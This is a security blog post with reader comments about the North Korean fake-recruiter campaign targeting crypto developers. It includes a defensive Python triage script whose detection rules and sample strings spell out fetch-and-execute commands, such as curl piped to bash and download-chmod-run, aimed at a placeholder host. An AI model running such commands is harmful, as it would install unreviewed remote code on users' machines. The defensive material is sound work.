Defending Against State-Sponsored Crypto Job Scams: A Security Best Practices Playbook

On April 24, 2025, cybersecurity firm Silent Push published a report that should alarm every developer working in the cryptocurrency space. North Korean hackers linked to the infamous Lazarus Group created legitimate-appearing shell companies in the United States to trick crypto developers into installing malware through fake job interviews. The FBI seized one of the domains, but the threat persists. With Bitcoin trading at $93,943 and the crypto market exceeding $3 trillion in total capitalization, the incentives for state-sponsored attackers have never been greater.

The Threat Landscape

The Silent Push report details how the Lazarus subgroup known as Contagious Interview established three shell companies: Blocknovas LLC, registered in New Mexico; Softglide LLC; and Angeloper Agency. These were not hastily assembled fronts. The companies used AI-generated headshots for fake employees, posted convincing job listings on GitHub and freelance platforms, and maintained professional-looking websites. The operation has been active since 2024 and has claimed multiple confirmed victims, including a developer whose MetaMask wallet was compromised.

This campaign is part of a broader pattern. The same Lazarus subgroup is connected to the $1.4 billion theft from Bybit earlier in 2025, making it one of the most prolific and dangerous cybercriminal operations targeting the cryptocurrency industry. The FBI has labeled North Korean cyber operations as among the most advanced persistent threats facing the United States. In March 2025, at least three crypto founders reported being lured into fake Zoom calls where attackers staged audio failures and pushed malicious software disguised as audio patches.

Core Principles

Defending against these threats starts with understanding the attack chain. The Contagious Interview campaign follows a consistent pattern: the attacker posts an attractive job listing, requests an introduction video from the applicant, and then triggers a fake error message during a simulated work task. The victim is instructed to copy and paste a supposed fix, which actually installs malware such as BeaverTail, InvisibleFerret, or OtterCookie. These tools steal cryptocurrency wallet keys, harvest clipboard data, and establish persistent access to the victim’s machine.
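The paste-a-fix step is the last point at which the victim can still stop. As an added example (not from the Silent Push report or from this article's author), the Python triage below flags pasted commands that fetch and execute code in a single step; the rule set and the sample commands are constructed for illustration and use the non-resolving example.invalid domain.

```python
import re

# Interpreters a pasted one-liner might hand downloaded content to.
_SH = r"(?:sudo\s+)?(?:bash|sh|zsh|python3?|node)\b"

# (label, pattern): each pattern is a shape where fetching and executing
# happen in one step, so the code is never reviewed before it runs.
RULES = [
    ("download piped to interpreter",
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*" + _SH, re.I)),
    ("decoded blob piped to interpreter",
     re.compile(r"\bbase64\s+(?:-d|--decode)\b[^|]*\|\s*" + _SH, re.I)),
    ("remote content in command substitution",
     re.compile(r"(?:\$\(|`)\s*(?:curl|wget)\b", re.I)),
    ("download, mark executable, run",
     re.compile(r"\b(?:curl|wget)\b.*&&\s*chmod\s+\+x\b", re.I)),
    ("PowerShell encoded command",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-(?:e|enc|encodedcommand)\b", re.I)),
]


def triage_command(cmd: str) -> list[str]:
    """Return the label of every rule the pasted command matches."""
    flat = " ".join(cmd.split())  # fold multi-line pastes onto one line
    return [label for label, rx in RULES if rx.search(flat)]


# Constructed samples (example.invalid never resolves); not taken from the report.
SAMPLES = {
    "pipe": "curl -fsSL https://example.invalid/audio-fix.sh | bash",
    "subst": 'bash -c "$(curl -fsSL https://example.invalid/setup)"',
    "chmod": "wget -q https://example.invalid/drv -O /tmp/drv && chmod +x /tmp/drv && /tmp/drv",
    "b64": "echo ZWNobyBoaQ== | base64 --decode | sh",
    "plain_download": "curl -O https://example.invalid/data.json",
    "benign": "git pull && npm test",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name:15} {triage_command(cmd) or 'no rule matched'}")
```

An empty result only means none of these shapes matched; it does not make a command safe to run on a machine that holds wallets.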

The first core principle is skepticism. Any unsolicited job offer or recruitment message, especially those arriving via Telegram, Discord, or email, should be treated as potentially hostile until verified independently. The second principle is isolation. Never install software or run commands on a machine that contains your cryptocurrency wallets or has access to sensitive accounts. The third principle is verification. Cross-reference company names against official business registries, check LinkedIn profiles for inconsistencies, and verify that the recruiting company actually exists before engaging.

Tooling & Setup

Developers working in the cryptocurrency space should implement several layers of protection. Use a dedicated machine or virtual machine for all job-related activities, separate from the machine used for crypto transactions and wallet management. Install endpoint detection and response software that can identify known Lazarus Group malware signatures. Use hardware wallets for all significant crypto holdings, and never connect a hardware wallet to a machine that has been used for untrusted software installations.

Browser extensions that block clipboard modifications can prevent clipboard-hijacking malware like OtterCookie from substituting cryptocurrency addresses during copy-paste operations. Email and messaging platforms should be configured with strict filtering rules that flag messages from unverified senders containing links or attachments. Developers should also enable multi-factor authentication on all exchange accounts and wallet services, using a hardware security key rather than SMS-based authentication, which is vulnerable to SIM-swapping attacks.

Ongoing Vigilance

The Blocknovas domain was seized by the FBI on April 24, but Softglide and other infrastructure remain operational. This means the threat is ongoing and evolving. North Korean operators are known to quickly spin up new front companies when old ones are exposed. Developers should subscribe to threat intelligence feeds from organizations like Silent Push, Mandiant, and the FBI’s IC3 alerts to stay informed about newly identified front companies and attack patterns.

Community vigilance matters as well. When the Blocknovas deception was first reported on April 24, security researcher Zach Edwards shared the findings publicly, enabling rapid awareness across the crypto development community. Sharing information about suspicious recruitment approaches, unusual interview processes, and potential malware encounters helps protect the entire ecosystem.

Final Takeaway

The convergence of state-sponsored cybercrime and cryptocurrency has created an environment where individual developers are on the front lines of a geopolitical conflict. The Lazarus Group’s fake company scheme demonstrates that attackers are investing significant resources into creating convincing cover stories. The best defense is a combination of technical safeguards, operational discipline, and a healthy dose of skepticism. If a job opportunity seems too good to be true, it probably is. Verify everything, isolate your crypto operations, and never run untrusted code on a machine that has access to your digital assets.

Disclaimer: This article is for informational purposes only and does not constitute financial or investment advice. Always conduct your own research before making any financial decisions.


11 thoughts on “Defending Against State-Sponsored Crypto Job Scams: A Security Best Practices Playbook”

  1. Marcus_DevOps

    This playbook is essential for anyone applying to Web3 roles today. I’ve seen several cases where ‘recruiters’ send over a GitHub repo that contains malicious packages hidden in the dependencies. Always audit what you’re being asked to run, especially if it’s a proprietary testing environment. Stay safe out there folks!

    1. blocknovas LLC registered in new mexico of all places. AI headshots and fake github repos. the lazarus group upgrades their opsec every cycle

      1. blocknovas and softglide LLCs registered in the US with AI headshots. lazarus has moved from phishing emails to full corporate impersonation. scary escalation

        1. AI headshots are getting indistinguishable from real ones. reverse image search used to catch fakes but now AI generates unique faces

  2. CryptoSkeptic99

    It’s wild that we even have to worry about state-sponsored actors in the job hunt, but that’s the reality of the industry now. I appreciate the tip about verifying the recruiter’s identity through multiple channels. If a deal looks too good to be true and they’re rushing the technical part, it’s probably a trap.

    1. a metamask wallet compromised through a fake technical interview. that's terrifying for anyone in web3 actively job hunting right now

      1. metamask compromise through a fake interview process is exactly why I use a separate wallet for any dev work. never connect your main to anything a recruiter sends you

        1. separate wallet for dev work should be standard practice. i have three tiers: main vault, active trading, and disposable for testing

  3. lazarus been running fake recruiter campaigns since at least 2020. the shell companies are new though, way more sophisticated
